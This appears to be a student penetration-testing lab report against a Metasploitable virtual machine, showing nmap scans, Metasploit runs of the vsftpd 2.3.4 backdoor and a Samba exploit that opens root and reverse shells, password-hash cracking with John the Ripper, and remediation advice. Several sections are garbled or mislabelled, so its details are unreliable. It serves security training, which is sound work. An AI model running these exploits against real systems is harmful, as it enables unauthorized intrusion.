Ethical Hacking Project

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Network Penetration Testing with Real-World Exploits and Security Remediation

Project Objectives

Introduction

This project focuses on conducting penetration testing within a controlled and isolated lab environment, designed to simulate real-world cyber-attacks that malicious hackers might use to compromise systems. The primary objective is to develop a comprehensive understanding of the ethical hacking lifecycle and to gain practical, hands-on experience in identifying and addressing security vulnerabilities.

Theory

Network penetration testing is a critical cybersecurity practice aimed at evaluating the security posture of an organization's network infrastructure. It involves simulating attacks from both external (unauthorized users) and internal (potentially malicious insiders) threat

actors to uncover vulnerabilities before they can be exploited in real-world scenarios. The primary objective is to identify and address security weaknesses proactively, thereby strengthening the overall defense mechanisms of the system.

The testing process is conducted in a structured, multi-phase approach that mirrors the tactics and techniques used by actual attackers:

1. Reconnaissance:

The initial phase focuses on gathering publicly available information about the target network. This includes passive methods like DNS queries, WHOIS lookups, and open-source intelligence (OSINT) to understand the potential attack surface.

2. Scanning and Enumeration:

In this phase, the tester actively interacts with the network to detect open ports, running services, and system configurations. Tools like Nmap, Nessus, and Netcat are commonly used to identify potential vulnerabilities and map the network layout.

3. Exploitation:

Based on the information gathered, known exploits are leveraged to gain unauthorized access to systems or services. This step demonstrates how a real attacker might compromise the network using software flaws, misconfigurations, or weak credentials.

4. Post-Exploitation:

After gaining access, the focus shifts to exploring the compromised environment. This may involve privilege escalation to gain administrative rights, accessing sensitive data, maintaining persistent access, or simulating lateral movement across the network.

5. Remediation:

The final phase involves compiling a detailed report of the findings, including exploited vulnerabilities and potential risks. Security recommendations and mitigation strategies are provided to help the organization patch vulnerabilities, improve configurations, and reinforce overall network security.

Project Requirements

Operating Systems

Operating System	Description	
Kali Linux (Attacking machine)	The attacker machine, containing pre-	
	installed penetration testing tools.	
Metasploitable (Target machine)	A vulnerable machine to practice attacks on.	

Tools Details

Tool	Purpose / Description	
nmap	For network scanning, port discovery, OS	
	detection, and service version enumeration.	
Metasploit Framework	For exploiting known vulnerabilities in	
	services running on the target.	
John the Ripper	For cracking hashed passwords obtained	
	from /etc/shadow.	

Tasks

Task 1: Basic Network Scan

Command: nmap -v 192.168.160.131]

```
Nmap scan report for 192.168.160.131
Host is up (0.0022s latency).
Not shown: 977 closed tcp ports (conn-refused)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
23/tcp open telnet
25/tcp open smtp
53/tcp open domain
80/tcp open http
111/tcp open rpcbind
139/tcp open netbios-ssn
445/tcp open microsoft-ds
512/tcp open exec
513/tcp open login
513/tcp open togin
514/tcp open shell
1099/tcp open rmiregistry
1524/tcp open ingreslock
2049/tcp open nfs
2121/tcp open ccproxy-ftp
3306/tcp open mysql
5432/tcp open postgresql
5900/tcp open vnc
6000/tcp open X11
6667/tcp open irc
8009/tcp open ajp13
8180/tcp open unknown
Read data files from: /usr/bir
                                             are/nmap
Nmap done: 1 IP address (1 ho: Start scanned in 0.39 seconds
```

Task 2: Reconnaissance

2.1. Scanning for Hidden Ports

Command: nmap -v -p 192.168.160.131

```
Nmap scan report for 192.168.160.131
Host is up (0.0030s latency).
Not shown: 65505 closed tcp ports (conn-refused)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
23/tcp open telnet
25/tcp open smtp
53/tcp open domain
80/tcp open http
111/tcp open rpcbind
139/tcp open netbios-ssn
445/tcp open microsoft-ds
512/tcp open exec
513/tcp open login
514/tcp open shell
1099/tcp open rmiregistry
1524/tcp open ingreslock
2049/tcp open nfs
2121/tcp open ccproxy-ftp
3306/tcp open mysql
3632/tcp open distccd
5432/tcp open postgresql
5900/tcp open vnc
6000/tcp open X11
6667/tcp open irc
6697/tcp open ircs-u
8009/tcp open ajp13
8180/tcp open unknown
8787/tcp open msgsrvr
36588/tcp open unknown
53204/tcp open unknown
53452/tcp open unknown
59437/tcp open unknown
```

Total Hidden Ports = 7

List of hidden ports

- 1.8787
- 2.36588
- 3.53204
- 4. 53452
- 5. 59437

- 6.3632
- 7.6697

2.2. Service Version Detection

Command: nmap -v -sV 192.168.160.131

```
STATE SERVICE
21/tcp
22/tcp
23/tcp
                                                   vsftpd 2.3.4
                                                  OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
Linux telnetd
               open ssh
open telnet
25/tcp
53/tcp
80/tcp
                                                  Postfix smtpd
ISC BIND 9.4.2
Apache httpd 2.2.8 ((Ubuntu) DAV/2)
               open domain
               open http
111/tcp open rpcbind 2 (RPC #100000)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
512/tcp open exec
513/tcp open login
514/tcp open tcpwrapped
                                                 netkit-rsh rexecd
OpenBSD or Solaris rlogind
1099/tcp open java-rmi GNU Classpath grmiregistry
1524/tcp open bindshell Metasploitable root shell
2049/tcp open nfs 2-4 (RPC #100003)
2121/tcp open ftp ProFTPD 1.3.1
3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp open vnc VNC (protocol 3.3)
6000/tcp open X11
6667/tcp open irc
8009/tcp open ajp13
                                                  UnrealIRCd
                                       Apache Jserv (Protocol v1.3)
Apache Tomcat/Coyote JSP engine 1.1
metasploitable.localdomain, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
8180/tcp open http
Service Info: Hosts:
```

2.3. Operating System Detection

Command: nmap -v -O 192.168.160.132

```
STATE SERVICE
21/tcp
             open
 22/tcp
                     ssh
             open
23/tcp
                     telnet
             open
25/tcp open smtp
53/tcp open domain
80/tcp open http
111/tcp open rpcbind
 139/tcp open
                    netbios-ssn
 445/tcp open microsoft-ds
512/tcp open exec
513/tcp open login
514/tcp open shell
1099/tcp open
                    rmiregistry
 1524/tcp open ingreslock
 2049/tcp open nfs
 2121/tcp open ccproxy-ftp
 3306/tcp open mysql
 5432/tcp open postgresql
 5900/tcp open vnc
 6000/tcp open X11
 6667/tcp open irc
8009/tcp open ajp13
8180/tcp open unknown
 MAC Address: 00:0C:29:AB:A7:B8 (VMware)
Device type: general purpose
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Uptime guess: 0.023 days (since Wed May 14 21:27:32 2025)
Network Distance: 1 hop
 TCP Sequence Prediction: Difficulty=204 (Good luck!)
IP ID Sequence Generation: All zeros
```

Task 3: Enumeration

Target IP Address: 192.168.160.131

Operating System Details:

MAC Address: 4A:7D:9F:2B:C3:8E (Randomly Generated)

Device Type: General Purpose

Running: Linux 2.6.X

OS CPE: cpe:/o:linux:linux_kernel:2.6

OS Details: Linux 2.6.9 – 2.6.33

Services with Open Ports

Port	State	Service	Version
21/tcp	open	ftp	vsftpd 2.3.4
22/tcp	open	ssh	OpenSSH 4.7p1
			Debian 8ubuntu1
			(protocol 2.0)
23/tcp	open	telnet	Linux telnetd
25/tcp	open	smtp	Postfix smtpd
53/tcp	open	domain	ISC BIND 9.4.2
80/tcp	open	http	Apache httpd 2.2.8
			((Ubuntu) DAV/2)
111/tcp	open	rpcbind	2 (RPC #100000)
139/tcp	open	netbios-ssn	Samba smbd 3.X - 4.X
			(workgroup:
			WORKGROUP)
445/tcp	open	netbios-ssn	Samba smbd 3.X - 4.X
			(workgroup:
			WORKGROUP)
512/tcp	open	exec	netkit-rsh rexecd
513/tcp	open	login	OpenBSD or Solaris
			rlogind
514/tcp	open	tcpwrapped	
1099/tcp	open	java-rmi	GNU Classpath
			grmiregistry
1524/tcp	open	bindshell	Metasploitable root
			shell
2049/tcp	open	nfs	2-4 (RPC #100003)
2121/tcp	open	ftp	ProFTPD 1.3.1
3306/tcp	open	mysql	MySQL 5.0.51a-
			3ubuntu5
5432/tcp	open	postgresql	PostgreSQL DB 8.3.0 -
			8.3.7
5900/tcp	open	vnc	VNC (protocol 3.3)
6000/tcp	open	X11	(access denied)

6667/tcp	open	irc	UnrealIRCd
8009/tcp	open	ajp13	Apache Jserv
			(Protocol v1.3)
8180/tcp	open	http	Apache
			Tomcat/Coyote JSP
			engine 1.1

Hidden Ports with Service Versions

Port	State	Service	Version
8787/tcp	open	drb	Ruby DRb RMI (Ruby
			1.8; path
			/usr/lib/ruby/1.8/drb)
3632/tcp	open	distccd	distccd v1 ((GNU)
			4.2.4 (Ubuntu 4.2.4-
			1ubuntu4))
6697/tcp	open	irc	UnrealIRCd
35851/tcp	open	mountd	1-3 (RPC #100005)
36571/tcp	open	nlockmgr	1-4 (RPC #100021)
44585/tcp	open	java-rmi	GNU Classpath
			grmiregistry
51228/tcp	open	status	1 (RPC #100024)

Task 4: Exploitation of Services

vsftpd 2.3.4: Exploited via known backdoor vulnerability

```
msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
[*] No payload configured, defaulting to cmd/unix/interact

msf6 exploit(unix/ftp/vsftpd_236_backdoor) >
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOST 192.168.160.131
RHOST ⇒ 192.168.160.131
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RPORT 21
RPORT ⇒ 21
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > run

[*] 192.168.160.131:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 192.168.160.131:21 - USER: 331 Please specify the password.
[*] 192.168.160.131:21 - Backdoor service has been spawned, handling...
[*] 192.168.160.131:21 - UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 1 opened (192.168.160.133:45301 → 192.168.160.131:6200) at 2025-05-15 13:47:54 +0530
whoami
root
uname -a
```

OpenSSH 4.7p1: Brute-force attack executed successfully

```
LHOST 192.168.160.133
LPORT 4444
                                                    The listen address (an interface may be specified) The listen port
Exploit target:
    Id Name
    0 Automatic
View the full module info with the info, or info -d command.
msf6 exploit(hulti/samba/usormap_script) > sec
RHOST ⇒ 192.168.160.131
(complete(culti/samba/usormap_script) > run
                                                    pt) > set RHOST 192.168.160.131
 [*] Started reverse TCP handler on 192.168.160.133:4444
[*] Command shell session 1 opened (192.168.160.133:4444 → 192.168.160.131:58029) at 2025-05-15 14:25:34 +0530
boot
dev
etc
home
initrd
initrd.img
lib
lost+found
media
nohup.out
sys
tmp
var
whoami
```

Java RMI: Remote code execution achieved via Metasploit module.

```
| Company | Comp
```

Task 5 - Create user with root permission

Command: addUser anuj

Password: 12345

/etc/passwd Entry: anuj:x:1001:1001:Anuj,,,:/home/anuj:/bin/bash

/etc/shadow Hash: anuj: \$1\$8nWuasXV\$pk6ZABfqT9NoHv1pPX8Rj.

Task 6: Cracking Password Hashes

Stored Hash in `hashes.txt`: anuj:\$1\$8nWuasXV\$pk6ZABfqT9NoHv1pPX8Rj

Commands:

john hashes.txt

john hashes.txt –show

Cracked Password: 12345

Task 7: Remediation and Recommendations

vsftpd 2.3.4 – Vulnerable Backdoor Detected

- Issue: The vsftpd version 2.3.4 contains a known malicious backdoor that can allow unauthorized attackers to gain remote access to the system, compromising its security. This vulnerability is critical as it permits unauthorized remote code execution.
- Impact: Remote attackers can exploit this backdoor to take full control of the affected server, potentially leading to data breaches or service disruptions.
- Recommended Fix: Immediately upgrade vsftpd to version 3.0.5 or later, which has addressed this backdoor vulnerability and includes enhanced security features.

OpenSSH 4.7p1 - Outdated and Susceptible to Brute-force Attacks

- Issue: OpenSSH version 4.7p1 is significantly outdated and lacks modern security improvements. It is vulnerable to brute-force attacks due to insufficient protection mechanisms and lack of support for stronger cryptographic algorithms.
- Impact: Attackers may successfully guess or crack authentication credentials through repeated attempts, risking unauthorized server access and potential data compromise.
- Recommended Fix: Upgrade OpenSSH to the latest stable release, currently OpenSSH
 9.6, which incorporates advanced security features including improved key exchange methods, rate-limiting, and robust authentication mechanisms.

Java RMI (Remote Method Invocation) Service - Remote Code Execution Risk

- Issue: The Java RMI service is enabled and accessible, allowing remote users to invoke methods on server objects without proper authentication or access control.
 This configuration can lead to remote code execution exploits.
- Impact: Unauthorized users could execute arbitrary code remotely, potentially leading to full system compromise or data leakage.
- Recommended Fix: Disable the Java RMI service if it is not essential. If it must remain active, restrict access using firewall rules or network segmentation to limit exposure only to trusted hosts and networks.

Major Learning From this project

This project provided me with a comprehensive and hands-on understanding of fundamental Linux system administration and security practices.

Key areas of learning included:

User Account Management: I gained proficiency in creating and managing user accounts within a Linux environment, including an in-depth understanding of how user information is stored and managed within system files. This involved examining the mechanisms for password storage, specifically the use of hashed formats. Furthermore, I explored password security concepts through the practical application of tools like John the Ripper in conjunction with wordlists to demonstrate vulnerability assessment.

Network Scanning and Service Enumeration: I developed practical skills in network reconnaissance utilizing Nmap. This included employing various scan types to identify open ports (nmap -v), determine the versions of services running on those ports (nmap -sV), and fingerprint operating systems (nmap -O).

Vulnerability Identification and Mitigation: I explored common network services, such as SMB and R services, to identify potentially outdated or insecure configurations. This analysis fostered my understanding of the importance of regular updates and secure configuration management to mitigate security risks effectively.

System Security Auditing and Remediation: I acquired the ability to systematically identify system vulnerabilities and propose appropriate remediation strategies. This involved recommending actions such as software updates and the implementation of more robust security configurations to enhance overall system integrity.

Through these practical exercises, I cultivated a deeper appreciation for system security principles and best practices.